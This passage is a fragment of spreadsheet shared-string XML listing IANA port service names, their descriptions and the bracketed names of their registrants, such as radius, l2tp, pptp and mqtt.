    <t>[Tong_Ming_Lee]</t>
  </si>
  <si>
    <t>visitview</t>
  </si>
  <si>
    <t>Visit view</t>
  </si>
  <si>
    <t>[Tom_Whittaker]</t>
  </si>
  <si>
    <t>pammratc</t>
  </si>
  <si>
    <t>PAMMRATC</t>
  </si>
  <si>
    <t>pammrpc</t>
  </si>
  <si>
    <t>PAMMRPC</t>
  </si>
  <si>
    <t>[John_Britton]</t>
  </si>
  <si>
    <t>loaprobe</t>
  </si>
  <si>
    <t>Log On America Probe</t>
  </si>
  <si>
    <t>[James_Tavares]</t>
  </si>
  <si>
    <t>edb-server1</t>
  </si>
  <si>
    <t>EDB Server 1</t>
  </si>
  <si>
    <t>[Carlos_Portela]</t>
  </si>
  <si>
    <t>isdc</t>
  </si>
  <si>
    <t>ISP shared public data control</t>
  </si>
  <si>
    <t>islc</t>
  </si>
  <si>
    <t>ISP shared local data control</t>
  </si>
  <si>
    <t>ismc</t>
  </si>
  <si>
    <t>ISP shared management control</t>
  </si>
  <si>
    <t>[Nick_Austin]</t>
  </si>
  <si>
    <t>cert-initiator</t>
  </si>
  <si>
    <t>cert-responder</t>
  </si>
  <si>
    <t>[Tom_Markson]</t>
  </si>
  <si>
    <t>invision</t>
  </si>
  <si>
    <t>InVision</t>
  </si>
  <si>
    <t>[Christopher_Davey]</t>
  </si>
  <si>
    <t>isis-am</t>
  </si>
  <si>
    <t>isis-ambc</t>
  </si>
  <si>
    <t>saiseh</t>
  </si>
  <si>
    <t>Satellite-data Acquisition System 4</t>
  </si>
  <si>
    <t>sightline</t>
  </si>
  <si>
    <t>SightLine</t>
  </si>
  <si>
    <t>[admin]</t>
  </si>
  <si>
    <t>sa-msg-port</t>
  </si>
  <si>
    <t>rsap</t>
  </si>
  <si>
    <t>[Holger_Reif]</t>
  </si>
  <si>
    <t>concurrent-lm</t>
  </si>
  <si>
    <t>[Maggie_Brinsford]</t>
  </si>
  <si>
    <t>kermit</t>
  </si>
  <si>
    <t>[Frank_da_Cruz]</t>
  </si>
  <si>
    <t>nkd</t>
  </si>
  <si>
    <t>nkdn</t>
  </si>
  <si>
    <t>shiva-confsrvr</t>
  </si>
  <si>
    <t>shiva_confsrvr
IANA assigned this well-formed service name as a replacement for "shiva_confsrvr".</t>
  </si>
  <si>
    <t>[Mike_Horowitz]</t>
  </si>
  <si>
    <t>shiva_confsrvr</t>
  </si>
  <si>
    <t>This entry is an alias to "shiva-confsrvr".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>xnmp</t>
  </si>
  <si>
    <t>[Ali_Saleh]</t>
  </si>
  <si>
    <t>alphatech-lm</t>
  </si>
  <si>
    <t>[Joseph_Hauk]</t>
  </si>
  <si>
    <t>stargatealerts</t>
  </si>
  <si>
    <t>[Tim_Coppernoll]</t>
  </si>
  <si>
    <t>dec-mbadmin</t>
  </si>
  <si>
    <t>dec-mbadmin-h</t>
  </si>
  <si>
    <t>[Nick_Shipman]</t>
  </si>
  <si>
    <t>fujitsu-mmpdc</t>
  </si>
  <si>
    <t>[Katsumi_Oomuro]</t>
  </si>
  <si>
    <t>sixnetudr</t>
  </si>
  <si>
    <t>sg-lm</t>
  </si>
  <si>
    <t>Silicon Grail License Manager</t>
  </si>
  <si>
    <t>[William_R_Bishop]</t>
  </si>
  <si>
    <t>skip-mc-gikreq</t>
  </si>
  <si>
    <t>netview-aix-1</t>
  </si>
  <si>
    <t>netview-aix-2</t>
  </si>
  <si>
    <t>netview-aix-3</t>
  </si>
  <si>
    <t>netview-aix-4</t>
  </si>
  <si>
    <t>netview-aix-5</t>
  </si>
  <si>
    <t>netview-aix-6</t>
  </si>
  <si>
    <t>netview-aix-7</t>
  </si>
  <si>
    <t>netview-aix-8</t>
  </si>
  <si>
    <t>netview-aix-9</t>
  </si>
  <si>
    <t>netview-aix-10</t>
  </si>
  <si>
    <t>netview-aix-11</t>
  </si>
  <si>
    <t>netview-aix-12</t>
  </si>
  <si>
    <t>[Martha_Crisson]</t>
  </si>
  <si>
    <t>proshare-mc-1</t>
  </si>
  <si>
    <t>Intel Proshare Multicast</t>
  </si>
  <si>
    <t>proshare-mc-2</t>
  </si>
  <si>
    <t>[Mark_Lewis]</t>
  </si>
  <si>
    <t>pdp</t>
  </si>
  <si>
    <t>Pacific Data Products</t>
  </si>
  <si>
    <t>[Gary_Morton]</t>
  </si>
  <si>
    <t>netcomm1</t>
  </si>
  <si>
    <t>netcomm2</t>
  </si>
  <si>
    <t>[Bulent_Kasman]</t>
  </si>
  <si>
    <t>groupwise</t>
  </si>
  <si>
    <t>[Brent_Bradshaw]</t>
  </si>
  <si>
    <t>prolink</t>
  </si>
  <si>
    <t>[Brian_Abramson]</t>
  </si>
  <si>
    <t>darcorp-lm</t>
  </si>
  <si>
    <t>[DARcorp]</t>
  </si>
  <si>
    <t>microcom-sbp</t>
  </si>
  <si>
    <t>[Boris_B_Maiden]</t>
  </si>
  <si>
    <t>sd-elmd</t>
  </si>
  <si>
    <t>[Bryan_Otey]</t>
  </si>
  <si>
    <t>lanyon-lantern</t>
  </si>
  <si>
    <t>[Robin_Lewis]</t>
  </si>
  <si>
    <t>ncpm-hip</t>
  </si>
  <si>
    <t>[Ken_Hearn]</t>
  </si>
  <si>
    <t>snaresecure</t>
  </si>
  <si>
    <t>SnareSecure</t>
  </si>
  <si>
    <t>[Marty_Batchelder]</t>
  </si>
  <si>
    <t>n2nremote</t>
  </si>
  <si>
    <t>[Kin_Chan_2]</t>
  </si>
  <si>
    <t>cvmon</t>
  </si>
  <si>
    <t>[Carol_Ann_Krug]</t>
  </si>
  <si>
    <t>nsjtp-ctrl</t>
  </si>
  <si>
    <t>nsjtp-data</t>
  </si>
  <si>
    <t>[Orazio_Granato]</t>
  </si>
  <si>
    <t>firefox</t>
  </si>
  <si>
    <t>[Mark_S_Edwards]</t>
  </si>
  <si>
    <t>ng-umds</t>
  </si>
  <si>
    <t>[Louis_E_Simard]</t>
  </si>
  <si>
    <t>empire-empuma</t>
  </si>
  <si>
    <t>[Bobby_Krupczak]</t>
  </si>
  <si>
    <t>sstsys-lm</t>
  </si>
  <si>
    <t>[Yih_Wu_Wang]</t>
  </si>
  <si>
    <t>rrirtr</t>
  </si>
  <si>
    <t>rrimwm</t>
  </si>
  <si>
    <t>rrilwm</t>
  </si>
  <si>
    <t>rrifmm</t>
  </si>
  <si>
    <t>rrisat</t>
  </si>
  <si>
    <t>[Allen_Briggs]</t>
  </si>
  <si>
    <t>rsvp-encap-1</t>
  </si>
  <si>
    <t>RSVP-ENCAPSULATION-1</t>
  </si>
  <si>
    <t>rsvp-encap-2</t>
  </si>
  <si>
    <t>RSVP-ENCAPSULATION-2</t>
  </si>
  <si>
    <t>mps-raft</t>
  </si>
  <si>
    <t>[Jason_Leupen]</t>
  </si>
  <si>
    <t>l2f</t>
  </si>
  <si>
    <t>l2tp</t>
  </si>
  <si>
    <t>[Andy_Valencia]</t>
  </si>
  <si>
    <t>deskshare</t>
  </si>
  <si>
    <t>[Sarah_Thompson]</t>
  </si>
  <si>
    <t>hb-engine</t>
  </si>
  <si>
    <t>[Charles_C_L_Chou]</t>
  </si>
  <si>
    <t>bcs-broker</t>
  </si>
  <si>
    <t>[Andy_Warner]</t>
  </si>
  <si>
    <t>slingshot</t>
  </si>
  <si>
    <t>[Paul_Groarke]</t>
  </si>
  <si>
    <t>jetform</t>
  </si>
  <si>
    <t>[gdeinsta]</t>
  </si>
  <si>
    <t>vdmplay</t>
  </si>
  <si>
    <t>[David_Thielen]</t>
  </si>
  <si>
    <t>gat-lmd</t>
  </si>
  <si>
    <t>[Igor_Zaoutine]</t>
  </si>
  <si>
    <t>centra</t>
  </si>
  <si>
    <t>[Drew_Wolff]</t>
  </si>
  <si>
    <t>impera</t>
  </si>
  <si>
    <t>[Stepehen_Campbell]</t>
  </si>
  <si>
    <t>pptconference</t>
  </si>
  <si>
    <t>[John_Tafoya]</t>
  </si>
  <si>
    <t>registrar</t>
  </si>
  <si>
    <t>resource monitoring service</t>
  </si>
  <si>
    <t>[Ron_Lawson]</t>
  </si>
  <si>
    <t>conferencetalk</t>
  </si>
  <si>
    <t>ConferenceTalk</t>
  </si>
  <si>
    <t>[George_Kajos]</t>
  </si>
  <si>
    <t>sesi-lm</t>
  </si>
  <si>
    <t>houdini-lm</t>
  </si>
  <si>
    <t>[Paul_Breslin]</t>
  </si>
  <si>
    <t>xmsg</t>
  </si>
  <si>
    <t>[Mark_E_Fogle]</t>
  </si>
  <si>
    <t>fj-hdnet</t>
  </si>
  <si>
    <t>[Manabu_Makino]</t>
  </si>
  <si>
    <t>h323gatedisc</t>
  </si>
  <si>
    <t>H.323 Multicast Gatekeeper Discover</t>
  </si>
  <si>
    <t>h323gatestat</t>
  </si>
  <si>
    <t>H.323 Unicast Gatekeeper Signaling</t>
  </si>
  <si>
    <t>h323hostcall</t>
  </si>
  <si>
    <t>H.323 Call Control Signalling</t>
  </si>
  <si>
    <t>H.323 Call Control</t>
  </si>
  <si>
    <t>caicci</t>
  </si>
  <si>
    <t>[Sylvia_Scheuren]</t>
  </si>
  <si>
    <t>hks-lm</t>
  </si>
  <si>
    <t>HKS License Manager</t>
  </si>
  <si>
    <t>[Michael_Wood]</t>
  </si>
  <si>
    <t>pptp</t>
  </si>
  <si>
    <t>[Ken_Crocker]</t>
  </si>
  <si>
    <t>csbphonemaster</t>
  </si>
  <si>
    <t>[Hans_Peter_Heffels]</t>
  </si>
  <si>
    <t>iden-ralp</t>
  </si>
  <si>
    <t>[Chris_Stanaway]</t>
  </si>
  <si>
    <t>iberiagames</t>
  </si>
  <si>
    <t>IBERIAGAMES</t>
  </si>
  <si>
    <t>[Jose_Luis]</t>
  </si>
  <si>
    <t>winddx</t>
  </si>
  <si>
    <t>[Bill_Andrews]</t>
  </si>
  <si>
    <t>telindus</t>
  </si>
  <si>
    <t>TELINDUS</t>
  </si>
  <si>
    <t>[Paul_Pyck]</t>
  </si>
  <si>
    <t>citynl</t>
  </si>
  <si>
    <t>CityNL License Management</t>
  </si>
  <si>
    <t>[CityDisc]</t>
  </si>
  <si>
    <t>roketz</t>
  </si>
  <si>
    <t>msiccp</t>
  </si>
  <si>
    <t>MSICCP</t>
  </si>
  <si>
    <t>proxim</t>
  </si>
  <si>
    <t>[Srinivas_N_Mogalapa]</t>
  </si>
  <si>
    <t>siipat</t>
  </si>
  <si>
    <t>SIMS - SIIPAT Protocol for Alarm Transmission</t>
  </si>
  <si>
    <t>[Steve_Ryckman]</t>
  </si>
  <si>
    <t>cambertx-lm</t>
  </si>
  <si>
    <t>Camber Corporation License Management</t>
  </si>
  <si>
    <t>[Jeannie_Burleson]</t>
  </si>
  <si>
    <t>privatechat</t>
  </si>
  <si>
    <t>PrivateChat</t>
  </si>
  <si>
    <t>street-stream</t>
  </si>
  <si>
    <t>[Glenn_Levitt]</t>
  </si>
  <si>
    <t>ultimad</t>
  </si>
  <si>
    <t>[Michael_Lanzetta]</t>
  </si>
  <si>
    <t>gamegen1</t>
  </si>
  <si>
    <t>GameGen1</t>
  </si>
  <si>
    <t>[Glen_Pearson]</t>
  </si>
  <si>
    <t>webaccess</t>
  </si>
  <si>
    <t>[Christian_Saether]</t>
  </si>
  <si>
    <t>encore</t>
  </si>
  <si>
    <t>[Stuart_Button]</t>
  </si>
  <si>
    <t>cisco-net-mgmt</t>
  </si>
  <si>
    <t>[John_McCormack]</t>
  </si>
  <si>
    <t>3Com-nsd</t>
  </si>
  <si>
    <t>[Nitza_Steinberg]</t>
  </si>
  <si>
    <t>cinegrfx-lm</t>
  </si>
  <si>
    <t>Cinema Graphics License Manager</t>
  </si>
  <si>
    <t>[Rodney_Iwashina]</t>
  </si>
  <si>
    <t>ncpm-ft</t>
  </si>
  <si>
    <t>remote-winsock</t>
  </si>
  <si>
    <t>[Avi_Nathan]</t>
  </si>
  <si>
    <t>ftrapid-1</t>
  </si>
  <si>
    <t>ftrapid-2</t>
  </si>
  <si>
    <t>[Richard_J_Williams]</t>
  </si>
  <si>
    <t>oracle-em1</t>
  </si>
  <si>
    <t>[Bob_Purvy]</t>
  </si>
  <si>
    <t>aspen-services</t>
  </si>
  <si>
    <t>[Mark_B_Hurst]</t>
  </si>
  <si>
    <t>sslp</t>
  </si>
  <si>
    <t>Simple Socket Library's PortMaster</t>
  </si>
  <si>
    <t>[Dr_Charles_E_Campb]</t>
  </si>
  <si>
    <t>swiftnet</t>
  </si>
  <si>
    <t>SwiftNet</t>
  </si>
  <si>
    <t>[Terry_Lim]</t>
  </si>
  <si>
    <t>lofr-lm</t>
  </si>
  <si>
    <t>Leap of Faith Research License Manager</t>
  </si>
  <si>
    <t>predatar-comms</t>
  </si>
  <si>
    <t>Predatar Comms Service</t>
  </si>
  <si>
    <t>[Silverstring_Ltd]</t>
  </si>
  <si>
    <t>[Ronnie_De_Giorgio]</t>
  </si>
  <si>
    <t>oracle-em2</t>
  </si>
  <si>
    <t>ms-streaming</t>
  </si>
  <si>
    <t>[Bret_O_Rourke]</t>
  </si>
  <si>
    <t>capfast-lmd</t>
  </si>
  <si>
    <t>[Chuck_Neal]</t>
  </si>
  <si>
    <t>cnhrp</t>
  </si>
  <si>
    <t>[William_Stoye]</t>
  </si>
  <si>
    <t>tftp-mcast</t>
  </si>
  <si>
    <t>[Tom_Emberson]</t>
  </si>
  <si>
    <t>spss-lm</t>
  </si>
  <si>
    <t>SPSS License Manager</t>
  </si>
  <si>
    <t>[Tex_Hull]</t>
  </si>
  <si>
    <t>www-ldap-gw</t>
  </si>
  <si>
    <t>[Nick_Emery]</t>
  </si>
  <si>
    <t>cft-0</t>
  </si>
  <si>
    <t>[Martine_Marchand]</t>
  </si>
  <si>
    <t>cft-1</t>
  </si>
  <si>
    <t>cft-2</t>
  </si>
  <si>
    <t>cft-3</t>
  </si>
  <si>
    <t>cft-4</t>
  </si>
  <si>
    <t>cft-5</t>
  </si>
  <si>
    <t>cft-6</t>
  </si>
  <si>
    <t>cft-7</t>
  </si>
  <si>
    <t>bmc-net-adm</t>
  </si>
  <si>
    <t>bmc-net-svc</t>
  </si>
  <si>
    <t>vaultbase</t>
  </si>
  <si>
    <t>[Jose_A_Sesin]</t>
  </si>
  <si>
    <t>essweb-gw</t>
  </si>
  <si>
    <t>EssWeb Gateway</t>
  </si>
  <si>
    <t>[Bob_Nattenberg]</t>
  </si>
  <si>
    <t>kmscontrol</t>
  </si>
  <si>
    <t>KMSControl</t>
  </si>
  <si>
    <t>[Roy_Chastain]</t>
  </si>
  <si>
    <t>global-dtserv</t>
  </si>
  <si>
    <t>[Nicholas_Davies]</t>
  </si>
  <si>
    <t>vdab</t>
  </si>
  <si>
    <t>data interchange between visual processing containers</t>
  </si>
  <si>
    <t>[MJA_Technology_LLC]</t>
  </si>
  <si>
    <t>[Mark_J._App]</t>
  </si>
  <si>
    <t>femis</t>
  </si>
  <si>
    <t>Federal Emergency Management Information System</t>
  </si>
  <si>
    <t>[Larry_Gerhardstein]</t>
  </si>
  <si>
    <t>powerguardian</t>
  </si>
  <si>
    <t>prodigy-intrnet</t>
  </si>
  <si>
    <t>prodigy-internet</t>
  </si>
  <si>
    <t>[Bob_Dedrick]</t>
  </si>
  <si>
    <t>pharmasoft</t>
  </si>
  <si>
    <t>[Ola_Strandberg]</t>
  </si>
  <si>
    <t>dpkeyserv</t>
  </si>
  <si>
    <t>[Yasunari_Gon_Yamasit]</t>
  </si>
  <si>
    <t>answersoft-lm</t>
  </si>
  <si>
    <t>[James_A_Brewster]</t>
  </si>
  <si>
    <t>hp-hcip</t>
  </si>
  <si>
    <t>[Allen_Baker]</t>
  </si>
  <si>
    <t>Decomissioned Port 04/14/00, ms</t>
  </si>
  <si>
    <t>[naonao]</t>
  </si>
  <si>
    <t>finle-lm</t>
  </si>
  <si>
    <t>Finle License Manager</t>
  </si>
  <si>
    <t>[Dongling_Wang]</t>
  </si>
  <si>
    <t>windlm</t>
  </si>
  <si>
    <t>Wind River Systems License Manager</t>
  </si>
  <si>
    <t>[Will_Dere]</t>
  </si>
  <si>
    <t>funk-logger</t>
  </si>
  <si>
    <t>funk-license</t>
  </si>
  <si>
    <t>[Cimarron_Boozer][Eric_Wilde]</t>
  </si>
  <si>
    <t>psmond</t>
  </si>
  <si>
    <t>[Will_Golson]</t>
  </si>
  <si>
    <t>hello</t>
  </si>
  <si>
    <t>Narrative Media Streaming Protocol</t>
  </si>
  <si>
    <t>ea1</t>
  </si>
  <si>
    <t>EA1</t>
  </si>
  <si>
    <t>[Kirk_MacLean]</t>
  </si>
  <si>
    <t>ibm-dt-2</t>
  </si>
  <si>
    <t>[Sam_Borman]</t>
  </si>
  <si>
    <t>rsc-robot</t>
  </si>
  <si>
    <t>[Andrew_Jay_Schneider]</t>
  </si>
  <si>
    <t>cera-bcm</t>
  </si>
  <si>
    <t>[Leo_Moesgaard]</t>
  </si>
  <si>
    <t>dpi-proxy</t>
  </si>
  <si>
    <t>[Charles_Gordon]</t>
  </si>
  <si>
    <t>vocaltec-admin</t>
  </si>
  <si>
    <t>Vocaltec Server Administration</t>
  </si>
  <si>
    <t>[Scott_Petrack]</t>
  </si>
  <si>
    <t>UMA</t>
  </si>
  <si>
    <t>[Martin_Kirk]</t>
  </si>
  <si>
    <t>etp</t>
  </si>
  <si>
    <t>Event Transfer Protocol</t>
  </si>
  <si>
    <t>[Mike_Wray]</t>
  </si>
  <si>
    <t>netrisk</t>
  </si>
  <si>
    <t>NETRISK</t>
  </si>
  <si>
    <t>[Kevin_Green]</t>
  </si>
  <si>
    <t>ansys-lm</t>
  </si>
  <si>
    <t>ANSYS-License manager</t>
  </si>
  <si>
    <t>[Suzanne_Lorrin_2]</t>
  </si>
  <si>
    <t>msmq</t>
  </si>
  <si>
    <t>Microsoft Message Que</t>
  </si>
  <si>
    <t>[Amnon_Horowitz]</t>
  </si>
  <si>
    <t>concomp1</t>
  </si>
  <si>
    <t>ConComp1</t>
  </si>
  <si>
    <t>[Ed_Vincent]</t>
  </si>
  <si>
    <t>hp-hcip-gwy</t>
  </si>
  <si>
    <t>HP-HCIP-GWY</t>
  </si>
  <si>
    <t>enl</t>
  </si>
  <si>
    <t>ENL</t>
  </si>
  <si>
    <t>[Brian_Olson]</t>
  </si>
  <si>
    <t>enl-name</t>
  </si>
  <si>
    <t>ENL-Name</t>
  </si>
  <si>
    <t>musiconline</t>
  </si>
  <si>
    <t>Musiconline</t>
  </si>
  <si>
    <t>[Craig_Weeks]</t>
  </si>
  <si>
    <t>fhsp</t>
  </si>
  <si>
    <t>Fujitsu Hot Standby Protocol</t>
  </si>
  <si>
    <t>[Eiki_Iwata]</t>
  </si>
  <si>
    <t>oracle-vp2</t>
  </si>
  <si>
    <t>Oracle-VP2</t>
  </si>
  <si>
    <t>[Craig_Fowler]</t>
  </si>
  <si>
    <t>oracle-vp1</t>
  </si>
  <si>
    <t>Oracle-VP1</t>
  </si>
  <si>
    <t>jerand-lm</t>
  </si>
  <si>
    <t>Jerand License Manager</t>
  </si>
  <si>
    <t>[Robert_Monat]</t>
  </si>
  <si>
    <t>scientia-sdb</t>
  </si>
  <si>
    <t>Scientia-SDB</t>
  </si>
  <si>
    <t>[SYSTEMS_MANAGER]</t>
  </si>
  <si>
    <t>radius</t>
  </si>
  <si>
    <t>RADIUS</t>
  </si>
  <si>
    <t>[RFC2865]</t>
  </si>
  <si>
    <t>radius-acct</t>
  </si>
  <si>
    <t>RADIUS Accounting</t>
  </si>
  <si>
    <t>[RFC2866]</t>
  </si>
  <si>
    <t>tdp-suite</t>
  </si>
  <si>
    <t>TDP Suite</t>
  </si>
  <si>
    <t>[Rob_Lockhart]</t>
  </si>
  <si>
    <t>mmpft</t>
  </si>
  <si>
    <t>MMPFT</t>
  </si>
  <si>
    <t>[Ralf_Muckenhirn]</t>
  </si>
  <si>
    <t>harp</t>
  </si>
  <si>
    <t>HARP</t>
  </si>
  <si>
    <t>[Bjorn_Chambless]</t>
  </si>
  <si>
    <t>rkb-oscs</t>
  </si>
  <si>
    <t>RKB-OSCS</t>
  </si>
  <si>
    <t>[Robert_Kevin_Breton]</t>
  </si>
  <si>
    <t>etftp</t>
  </si>
  <si>
    <t>Enhanced Trivial File Transfer Protocol</t>
  </si>
  <si>
    <t>[William_Polites]</t>
  </si>
  <si>
    <t>plato-lm</t>
  </si>
  <si>
    <t>Plato License Manager</t>
  </si>
  <si>
    <t>[Mark_Morris]</t>
  </si>
  <si>
    <t>mcagent</t>
  </si>
  <si>
    <t>[Ryoichi_Shinohara]</t>
  </si>
  <si>
    <t>donnyworld</t>
  </si>
  <si>
    <t>[Don_Oliver]</t>
  </si>
  <si>
    <t>es-elmd</t>
  </si>
  <si>
    <t>[David_Duncan]</t>
  </si>
  <si>
    <t>unisys-lm</t>
  </si>
  <si>
    <t>Unisys Natural Language License Manager</t>
  </si>
  <si>
    <t>[Raymond_A_Diedrichs]</t>
  </si>
  <si>
    <t>metrics-pas</t>
  </si>
  <si>
    <t>[Tom_Haapanen]</t>
  </si>
  <si>
    <t>direcpc-video</t>
  </si>
  <si>
    <t>DirecPC Video</t>
  </si>
  <si>
    <t>[Chris_Kerrigan]</t>
  </si>
  <si>
    <t>ardt</t>
  </si>
  <si>
    <t>ARDT</t>
  </si>
  <si>
    <t>[Mike_Goddard]</t>
  </si>
  <si>
    <t>asi</t>
  </si>
  <si>
    <t>ASI</t>
  </si>
  <si>
    <t>[Bob_Tournoux]</t>
  </si>
  <si>
    <t>itm-mcell-u</t>
  </si>
  <si>
    <t>optika-emedia</t>
  </si>
  <si>
    <t>Optika eMedia</t>
  </si>
  <si>
    <t>[Daryle_DeBalski]</t>
  </si>
  <si>
    <t>net8-cman</t>
  </si>
  <si>
    <t>Oracle Net8 CMan Admin</t>
  </si>
  <si>
    <t>[Shuvayu_Kanjilal]</t>
  </si>
  <si>
    <t>myrtle</t>
  </si>
  <si>
    <t>Myrtle</t>
  </si>
  <si>
    <t>[Ron_Achin]</t>
  </si>
  <si>
    <t>tht-treasure</t>
  </si>
  <si>
    <t>ThoughtTreasure</t>
  </si>
  <si>
    <t>[Erik_Mueller]</t>
  </si>
  <si>
    <t>udpradio</t>
  </si>
  <si>
    <t>[Guus_Sliepen]</t>
  </si>
  <si>
    <t>ardusuni</t>
  </si>
  <si>
    <t>ARDUS Unicast</t>
  </si>
  <si>
    <t>ardusmul</t>
  </si>
  <si>
    <t>ARDUS Multicast</t>
  </si>
  <si>
    <t>[Toshikatsu_Ito]</t>
  </si>
  <si>
    <t>ste-smsc</t>
  </si>
  <si>
    <t>[Tom_Snauwaert]</t>
  </si>
  <si>
    <t>csoft1</t>
  </si>
  <si>
    <t>[John_Coll]</t>
  </si>
  <si>
    <t>talnet</t>
  </si>
  <si>
    <t>TALNET</t>
  </si>
  <si>
    <t>[Aaron_Lav]</t>
  </si>
  <si>
    <t>netopia-vo1</t>
  </si>
  <si>
    <t>netopia-vo2</t>
  </si>
  <si>
    <t>netopia-vo3</t>
  </si>
  <si>
    <t>netopia-vo4</t>
  </si>
  <si>
    <t>netopia-vo5</t>
  </si>
  <si>
    <t>direcpc-dll</t>
  </si>
  <si>
    <t>DirecPC-DLL</t>
  </si>
  <si>
    <t>altalink</t>
  </si>
  <si>
    <t>[Alberto_Raydan]</t>
  </si>
  <si>
    <t>tunstall-pnc</t>
  </si>
  <si>
    <t>Tunstall PNC</t>
  </si>
  <si>
    <t>[Robert_M_Moore]</t>
  </si>
  <si>
    <t>slp-notify</t>
  </si>
  <si>
    <t>SLP Notification</t>
  </si>
  <si>
    <t>[RFC3082]</t>
  </si>
  <si>
    <t>fjdocdist</t>
  </si>
  <si>
    <t>[Yuichi_Ohiwa]</t>
  </si>
  <si>
    <t>alpha-sms</t>
  </si>
  <si>
    <t>ALPHA-SMS</t>
  </si>
  <si>
    <t>[Benjamin_Grimm]</t>
  </si>
  <si>
    <t>gsi</t>
  </si>
  <si>
    <t>GSI</t>
  </si>
  <si>
    <t>[William_Mullaney]</t>
  </si>
  <si>
    <t>ctcd</t>
  </si>
  <si>
    <t>[John_Ryan]</t>
  </si>
  <si>
    <t>virtual-time</t>
  </si>
  <si>
    <t>Virtual Time</t>
  </si>
  <si>
    <t>[Angie_S_Morner]</t>
  </si>
  <si>
    <t>vids-avtp</t>
  </si>
  <si>
    <t>VIDS-AVTP</t>
  </si>
  <si>
    <t>[Sascha_Kuemmel]</t>
  </si>
  <si>
    <t>buddy-draw</t>
  </si>
  <si>
    <t>Buddy Draw</t>
  </si>
  <si>
    <t>[Marvin_Shin]</t>
  </si>
  <si>
    <t>fiorano-rtrsvc</t>
  </si>
  <si>
    <t>Fiorano RtrSvc</t>
  </si>
  <si>
    <t>fiorano-msgsvc</t>
  </si>
  <si>
    <t>Fiorano MsgSvc</t>
  </si>
  <si>
    <t>[Albert_Holt_2]</t>
  </si>
  <si>
    <t>datacaptor</t>
  </si>
  <si>
    <t>DataCaptor</t>
  </si>
  <si>
    <t>[Steven_M_Forrester]</t>
  </si>
  <si>
    <t>privateark</t>
  </si>
  <si>
    <t>PrivateArk</t>
  </si>
  <si>
    <t>[Ronen_Zoran]</t>
  </si>
  <si>
    <t>gammafetchsvr</t>
  </si>
  <si>
    <t>Gamma Fetcher Server</t>
  </si>
  <si>
    <t>[Cnaan_Aviv]</t>
  </si>
  <si>
    <t>sunscalar-svc</t>
  </si>
  <si>
    <t>SunSCALAR Services</t>
  </si>
  <si>
    <t>[Sanjay_Radia]</t>
  </si>
  <si>
    <t>lecroy-vicp</t>
  </si>
  <si>
    <t>LeCroy VICP</t>
  </si>
  <si>
    <t>[Anthony_Cake]</t>
  </si>
  <si>
    <t>mysql-cm-agent</t>
  </si>
  <si>
    <t>MySQL Cluster Manager Agent</t>
  </si>
  <si>
    <t>[Andrew_Morgan]</t>
  </si>
  <si>
    <t>msnp</t>
  </si>
  <si>
    <t>MSNP</t>
  </si>
  <si>
    <t>[William_Lai]</t>
  </si>
  <si>
    <t>paradym-31port</t>
  </si>
  <si>
    <t>Paradym 31 Port</t>
  </si>
  <si>
    <t>[David_Wooden]</t>
  </si>
  <si>
    <t>entp</t>
  </si>
  <si>
    <t>ENTP</t>
  </si>
  <si>
    <t>[Seiko_Epson]</t>
  </si>
  <si>
    <t>swrmi</t>
  </si>
  <si>
    <t>[Jun_Yoshii]</t>
  </si>
  <si>
    <t>udrive</t>
  </si>
  <si>
    <t>UDRIVE</t>
  </si>
  <si>
    <t>[Robby_Walker]</t>
  </si>
  <si>
    <t>viziblebrowser</t>
  </si>
  <si>
    <t>VizibleBrowser</t>
  </si>
  <si>
    <t>[Jimmy_Talbot]</t>
  </si>
  <si>
    <t>transact</t>
  </si>
  <si>
    <t>TransAct</t>
  </si>
  <si>
    <t>[TransAct_Futures_Dev]</t>
  </si>
  <si>
    <t>sunscalar-dns</t>
  </si>
  <si>
    <t>SunSCALAR DNS Service</t>
  </si>
  <si>
    <t>canocentral0</t>
  </si>
  <si>
    <t>Cano Central 0</t>
  </si>
  <si>
    <t>canocentral1</t>
  </si>
  <si>
    <t>Cano Central 1</t>
  </si>
  <si>
    <t>[Mark_McNamara]</t>
  </si>
  <si>
    <t>fjmpjps</t>
  </si>
  <si>
    <t>Fjmpjps</t>
  </si>
  <si>
    <t>fjswapsnp</t>
  </si>
  <si>
    <t>Fjswapsnp</t>
  </si>
  <si>
    <t>[Y_Ohiwa]</t>
  </si>
  <si>
    <t>westell-stats</t>
  </si>
  <si>
    <t>westell stats</t>
  </si>
  <si>
    <t>[Thomas_McCabe]</t>
  </si>
  <si>
    <t>ewcappsrv</t>
  </si>
  <si>
    <t>[Howard_Yin]</t>
  </si>
  <si>
    <t>hp-webqosdb</t>
  </si>
  <si>
    <t>drmsmc</t>
  </si>
  <si>
    <t>[Katsuhiko_Abe]</t>
  </si>
  <si>
    <t>nettgain-nms</t>
  </si>
  <si>
    <t>NettGain NMS</t>
  </si>
  <si>
    <t>[Dr_Yair_Shapira]</t>
  </si>
  <si>
    <t>vsat-control</t>
  </si>
  <si>
    <t>Gilat VSAT Control</t>
  </si>
  <si>
    <t>[Yariv_Kaplan]</t>
  </si>
  <si>
    <t>ibm-mqseries2</t>
  </si>
  <si>
    <t>IBM WebSphere MQ Everyplace</t>
  </si>
  <si>
    <t>[Jane_Porter]</t>
  </si>
  <si>
    <t>ecsqdmn</t>
  </si>
  <si>
    <t>CA eTrust Common Services</t>
  </si>
  <si>
    <t>[Paul_Wissmiller]</t>
  </si>
  <si>
    <t>mqtt</t>
  </si>
  <si>
    <t>Message Queuing Telemetry Transport Protocol</t>
  </si>
  <si>
    <t>[OASIS]</t>
  </si>
  <si>
    <t>[Robin_Cover]</t>
  </si>
  <si>
    <t>idmaps</t>
  </si>
  <si>
    <t>Internet Distance Map Svc</t>
  </si>
  <si>
    <t>[Sugih_Jamim]</t>
  </si>
  <si>
    <t>vrtstrapserver</t>
  </si>
  <si>
    <t>Veritas Trap Server</t>
  </si>
  <si>
    <t>[Russell_Thrasher]</t>
  </si>
  <si>
    <t>leoip</t>
  </si>
  <si>
    <t>Leonardo over IP</t>
  </si>
  <si>
    <t>[Dietmar_Finkler]</t>
  </si>
  <si>
    <t>filex-lport</t>
  </si>
  <si>
    <t>FileX Listening Port</t>
  </si>
  <si>
    <t>[Megan_Woods]</t>
  </si>
  <si>
    <t>ncconfig</t>
  </si>
  <si>
    <t>NC Config Port</t>
  </si>
  <si>
    <t>[Simon_Parker]</t>
  </si>
  <si>
    <t>unify-adapter</t>
  </si>
  <si>
    <t>Unify Web Adapter Service</t>
  </si>
  <si>
    <t>wilkenlistener</t>
  </si>
  <si>
    <t>wilkenListener</t>
  </si>
  <si>
    <t>[Wilken_GmbH]</t>
